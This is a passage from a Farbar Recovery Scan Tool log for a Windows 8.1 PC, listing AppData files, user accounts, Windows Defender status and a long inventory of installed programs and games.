2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\ProgramData\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\ProgramData\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\Users\Public\Desktop\Google Docs.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\ProgramData\Desktop\Google Docs.lnk

==================== Files in the root of some directories ========

2016-05-08 17:11 - 2020-08-20 21:11 - 000000034 _____ () C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat
2016-08-03 17:39 - 2016-08-03 17:39 - 000001598 _____ () C:\Users\Tomika\AppData\Roaming\Pecture
2019-05-26 22:16 - 2019-05-26 22:16 - 000001354 _____ () C:\Users\Tomika\AppData\Roaming\PureRef.ini
2016-07-14 03:15 - 2016-06-25 13:58 - 003760289 _____ (KNIGHT ) C:\Users\Tomika\AppData\Roaming\Setup.exe
2017-03-03 18:32 - 2017-03-03 18:32 - 000000218 _____ () C:\Users\Tomika\AppData\Local\.recently-used.xbel
2019-04-28 23:18 - 2019-04-28 23:18 - 000001456 _____ () C:\Users\Tomika\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-05-01 16:56 - 2017-05-01 16:56 - 000000000 ___SH () C:\Users\Tomika\AppData\Local\LumaEmu
2018-09-30 20:56 - 2018-09-30 20:56 - 000000000 _____ () C:\Users\Tomika\AppData\Local\oobelibMkey.log
2017-03-03 18:45 - 2017-03-03 18:45 - 000000779 _____ () C:\Users\Tomika\AppData\Local\recently-used.xbel
2017-09-29 20:46 - 2017-09-29 20:46 - 027393556 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp
2017-09-29 20:46 - 2017-09-29 20:46 - 000000000 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp
2017-09-29 20:46 - 2017-09-29 20:48 - 074558506 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-10-22 20:18
==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-10-2020
Ran by Tomika (23-10-2020 10:45:47)
Running from C:\Users\Tomika\Desktop
Windows 8.1 Pro (Update) (X64) (2016-05-02 17:09:48)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2643689781-145595849-2857803826-500 - Administrator - Disabled)
Guest (S-1-5-21-2643689781-145595849-2857803826-501 - Limited - Disabled)
Tomika (S-1-5-21-2643689781-145595849-2857803826-1001 - Administrator - Enabled) => C:\Users\Tomika

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7 Billion Humans (HKLM-x32\...\2056114425_is1) (Version: 1.0.32472 - GOG.com)
7-Zip 15.14 (x64) (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.08 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.0.327 - Adobe Systems Incorporated)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.445 - Adobe)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CC 2014 (HKLM-x32\...\{2B4B4082-8043-4646-8334-B0A29E641211}) (Version: 18.1.1 - Adobe Systems Incorporated)
Adobe InDesign CC 2018 (HKLM-x32\...\IDSN_13_0) (Version: 13.0 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_0) (Version: 18.0.0 - Adobe Systems Incorporated)
Anaconda3 2020.02 (Python 3.7.6 64-bit) (HKLM\...\Anaconda3 2020.02 (Python 3.7.6 64-bit)) (Version: 2020.02 - Anaconda, Inc.)
Application Verifier x64 External Package (HKLM\...\{D9908CED-5ABB-FEE9-FC84-743F4D38637C}) (Version: 10.1.16299.15 - Microsoft) Hidden
Arduino (HKLM-x32\...\Arduino) (Version: 1.8.12 - Arduino LLC)
Assassin's Creed II (HKLM-x32\...\Uplay Install 4) (Version: - Ubisoft)
Atom (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\atom) (Version: 1.51.0 - GitHub Inc.)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.1.0.137 - Autodesk)
Autodesk Fusion 360 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.9144 - Autodesk, Inc.)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Netfabb Standard version 2017 (HKLM\...\{7F33137F-253B-418F-8600-0CC68A279528}}_is1) (Version: 2017 - Autodesk netfabb)
Autodesk_Netfabb_Standard_ADLM (HKLM\...\{95E20DC3-CA0C-4040-976B-0B9194396EB0}) (Version: 1.0.0.0 - Autodesk) Hidden
Backup and Sync from Google (HKLM\...\{B109BD68-709A-485B-97E6-651FEB234AC9}) (Version: 3.51.3307.8076 - Google, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Blender (HKLM\...\{A0C803A1-310C-4EFF-B881-CA10CF7CD6A7}) (Version: 2.90.1 - Blender Foundation)
Blender (HKLM\...\{A239FF96-639F-4269-9673-E7ED60D5C74D}) (Version: 2.83.3 - Blender Foundation)
Blender (HKLM\...\{A6B045E1-6F1C-4FCD-936A-EE272B675EC8}) (Version: 2.81.1 - Blender Foundation)
Blender (HKLM\...\{EDFAE2A8-E73B-4CD1-9648-46A7E4434BDA}) (Version: 2.82.1 - Blender Foundation)
Blender (HKLM\...\{F343C69A-4ABA-434C-9C73-12A519D269CD}) (Version: 2.80.0 - Blender Foundation)
Bloody7 (HKLM-x32\...\Bloody3) (Version: 20.02.0002 - Bloody)
Call of Duty 2 version 1.3.0.0 (HKLM-x32\...\Call of Duty 2_is1) (Version: 1.3.0.0 - Mr DJ)
Call of Duty 4 - Modern Warfare (HKLM-x32\...\Call of Duty 4 - Modern Warfare_is1) (Version: - )
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.7 - Activision)
Call of Duty: Modern Warfare 2 (HKLM-x32\...\Call of Duty: Modern Warfare 2_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.71 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
DaVinci Resolve (HKLM\...\{395391BE-FF9A-4A2A-BA89-0EAE0DB0F37B}) (Version: 15.3.0008 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{B1782967-E600-4BBD-B2F1-AEF3F2FE0A12}) (Version: 1.2.1.0 - Blackmagic Design)
Desperados 3 (HKLM-x32\...\Desperados 3_is1) (Version: - )
Discord (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Discord) (Version: 0.0.308 - Discord Inc.)
Driver Booster 7 (HKLM-x32\...\Driver Booster_is1) (Version: 7.2.0 - IObit)
Epic Games Launcher (HKLM-x32\...\{C69A2919-0662-4390-9418-67C931B44C18}) (Version: 1.1.236.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Git version 2.28.0 (HKLM\...\Git_is1) (Version: 2.28.0 - The Git Development Community)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 86.0.4240.111 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Grammarly for Microsoft® Office Suite (HKLM\...\{4A6C3487-B58C-4A7D-B224-499CA5F99A7B}) (Version: 6.7.217 - Grammarly) Hidden
Grammarly for Microsoft® Office Suite (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{b7cd3fad-1dd9-41df-9c0c-688b0f8cd287}) (Version: 6.7.217 - Grammarly)
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Human Resource Machine (HKLM-x32\...\1444812654_is1) (Version: 1.0.31924 - GOG.com)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5074 - Intel Corporation)
Java 10.0.1 (64-bit) (HKLM\...\{D33DF729-38BB-5651-9D40-93BFEFB5DCED}) (Version: 10.0.1.0 - Oracle Corporation)
Kite (HKLM\...\Kite) (Version: - Manhattan Engineering Inc)
Kits Configuration Installer (HKLM-x32\...\{86E59C8F-61D5-1782-A3CE-60AE7E4D7791}) (Version: 10.1.16299.15 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Lindo 2.4.0 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\fcf71806-bbf8-5201-910f-7499961bc8e8) (Version: 2.4.0 - Prixe)
LLVM (HKLM-x32\...\LLVM) (Version: 3.9.1 - LLVM)
Media Player Codec Pack 4.4.8 (HKLM-x32\...\Media Player - Codec Pack) (Version: 4.4.8 - Media Player Codec Pack)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Mendeley Desktop 1.17.6 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.6 - Mendeley Ltd.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 83.0.478.50 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.129.37 - )
Microsoft Mathematics Add-in (64-bit) (HKLM\...\{E2C98732-F973-4985-A9C5-DC06178E16EE}) (Version: 2.0.040811.01 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.50.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1089.1204 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 3.1.3 (x64) (HKLM-x32\...\{f7152f3d-2c9d-4752-8a92-045a03b85f42}) (Version: 3.1.3.28628 - Microsoft Corporation)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 72.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 72.0.2 (x64 cs)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.1.2 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 cs) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 cs)) (Version: 68.12.1 - Mozilla)
MSI Development Tools (HKLM-x32\...\{973CACA2-E018-065B-0580-F2784802E299}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
MY.GAMES GameCenter (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\GameCenter) (Version: 4.1561 - MY.COM B.V.)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2013 - slovenčina (HKLM\...\{90150000-001F-041B-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.7 - Notepad++ Team)
Npcap (HKLM-x32\...\NpcapInst) (Version: 0.9990 - Nmap Project)
Nuked Cockroach Launcher 0.9.12 (HKLM-x32\...\Nuked Cockroach Launcher) (Version: 0.9.12 - Nuked Cockroach Studio)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Miracast Virtual Audio 378.78 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 378.78 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{C5C1C0F0-D62F-4DBF-81D4-D7EF397C228B}) (Version: 9.09.0814 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
odrive (HKLM\...\{32AA7EE2-2DA0-4CD9-ACD1-5D205E7A3F63}) (Version: 1.00.6236 - Oxygen Cloud, Inc.) Hidden
odrive (HKLM-x32\...\{e6ab88b8-5dd2-44c5-8ef1-6c2a7b48199b}) (Version: 1.0.6236 - Oxygen Cloud, Inc.)
Open 3D Model Viewer (HKLM-x32\...\{EBDFEC36-5277-454F-875B-F0AA2CDC3C92}) (Version: 1.10.0000 - Alexander Gessler)
Origin91 (HKLM-x32\...\{ADC55813-F4DD-47AA-94F3-CA35E1447E26}) (Version: 9.10.00 - OriginLab Corporation)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
PotPlayer-64 bit (HKLM\...\PotPlayer64) (Version: 200525 - Kakao Corp.)
PowDLL Converter 2.86 (HKLM-x32\...\PowDLL Converter) (Version: 2.86 - Nikolaos Kourkoumelis)
PPspliT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\PPspliT) (Version: 1.17 - )
Profex (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{d7553a1d-aae9-4f43-a693-9dcc4e118c61}) (Version: 4.0.0 - doebelin.org)
Prusa3D version 2.2.9.1 (HKLM\...\Prusa3D_is1) (Version: 2.2.9.1 - Prusa Research a.s.)
PrusaSlicer version 2.2.0 (HKLM\...\PrusaSlicer_is1) (Version: 2.2.0 - Prusa Research s.r.o.)
PureRef (HKLM-x32\...\PureRef) (Version: 1.9.2 - Idyllic Pixel)
Python 3.7.5 (64-bit) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{5e6d7bfa-46e9-4496-9ccd-e15816be8f0a}) (Version: 3.7.5150.0 - Python Software Foundation)
Python 3.7.5 Core Interpreter (64-bit) (HKLM\...\{6DC6BC71-F1FB-412D-A16A-2FE8C463E89F}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Development Libraries (64-bit) (HKLM\...\{5A54B213-36D8-40CB-9E55-D20864AEF3C8}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Executables (64-bit) (HKLM\...\{8864B390-4DFB-43AB-934B-F02C48577666}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 pip Bootstrap (64-bit) (HKLM\...\{2E590D5A-4E40-4C9C-AFF8-7CB80F085752}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Standard Library (64-bit) (HKLM\...\{45CB356A-C0DF-430E-B75F-7764DBA06DF9}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Utility Scripts (64-bit) (HKLM\...\{EFF40415-0D5B-4CBA-9080-3EE2DADB527C}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
qBittorrent 4.2.1 (HKLM-x32\...\qBittorrent) (Version: 4.2.1 - The qBittorrent project)
R for Windows 3.5.0 (HKLM\...\R for Windows 3.5.0_is1) (Version: 3.5.0 - R Core Team)
RDT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\RDT) (Version: 0.7.28 - Gamers Net Inc)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8581 - Realtek Semiconductor Corp.)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.1.0.1120 - Samsung Electronics)
SDK ARM Additions (HKLM-x32\...\{7922BB77-0B59-840A-AC80-D560A34D75C5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{C87DF65C-A672-7E08-A083-E7D48FE8DB70}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
SigmaPlot 11.0 (HKLM-x32\...\{B1A88375-BAB9-4081-B58F-A137FC6ED2A4}) (Version: 11.0 - Systat Software, Inc.)
Skype version 8.63 (HKLM-x32\...\Skype_is1) (Version: 8.63 - Skype Technologies S.A.)
StarCraft II Legacy of the Void (HKLM\...\U3RhckNyYWZ0SUk=_is1) (Version: 1 - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StyleWriter 4 (HKLM-x32\...\{D770F0F3-650B-4D7A-945D-49ADB1182BD9}) (Version: 4.02.02 - Editor Software (UK) Ltd)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
The Witcher 3: Wild Hunt - Game of the Year Edition (HKLM-x32\...\1495134320_is1) (Version: 1.32 - GOG.com)
They Are Billions (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\They Are Billions) (Version: - HOODLUM)
Universal CRT Extension SDK (HKLM-x32\...\{A5FA2886-1925-133F-0D41-B9A8ECEA0A2D}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{B739B4C5-EEEC-8E70-0276-38C4779AF398}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{A9D6F52C-694E-3E41-7AB8-5BEB644742A5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{E053089E-7953-3219-814F-F485FC151C54}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{B9424F08-0617-C4F6-A798-5A9250C1A738}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{D261CEA1-AB8D-9CFA-4407-BCEFC78661AC}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-012B-0409-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 98.0 - Ubisoft)
vcpp_crt.redist.clickonce (HKLM-x32\...\{16E08161-F78C-4FFC-8E12-F9BEA280795F}) (Version: 14.16.27012 - Microsoft Corporation) Hidden
Visual Studio Community 2017 (HKLM-x32\...\aa5cdd5f) (Version: 15.9.28307.222 - Microsoft Corporation)
Visuino version 7.8.3.69 (HKLM-x32\...\Visuino_is1) (Version: - Mitov Software LLC)
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.24-2 - Wacom Technology Corp.)
Warface My.Com (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Warface My.Com) (Version: 1.131 - MY.GAMES)
Wasteland 3 (HKLM-x32\...\Wasteland 3_is1) (Version: - )
WinAppDeploy (HKLM-x32\...\{9690D51C-4435-1C20-7819-66CCAB0F03F9}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{350F0ECD-0783-4529-8797-98F0AD33EAC0}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.16299.15 (HKLM-x32\...\{6195c203-b53c-4bb7-983a-6070a902e704}) (Version: 10.1.16299.15 - Microsoft Corporation)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{385A1387-A488-9E90-3635-086129610034}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{D7DD3171-DA58-52A1-95B2-4769640855AF}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7336279F-8F8F-5530-A543-3BE963846C0A}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E414A474-0A87-4F66-C409-A4D9857CFD34}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{CE760B86-975B-F514-5673-0ED4332B801B}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{5E67F8BE-D8D2-257F-CE19-419A2D5125C7}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
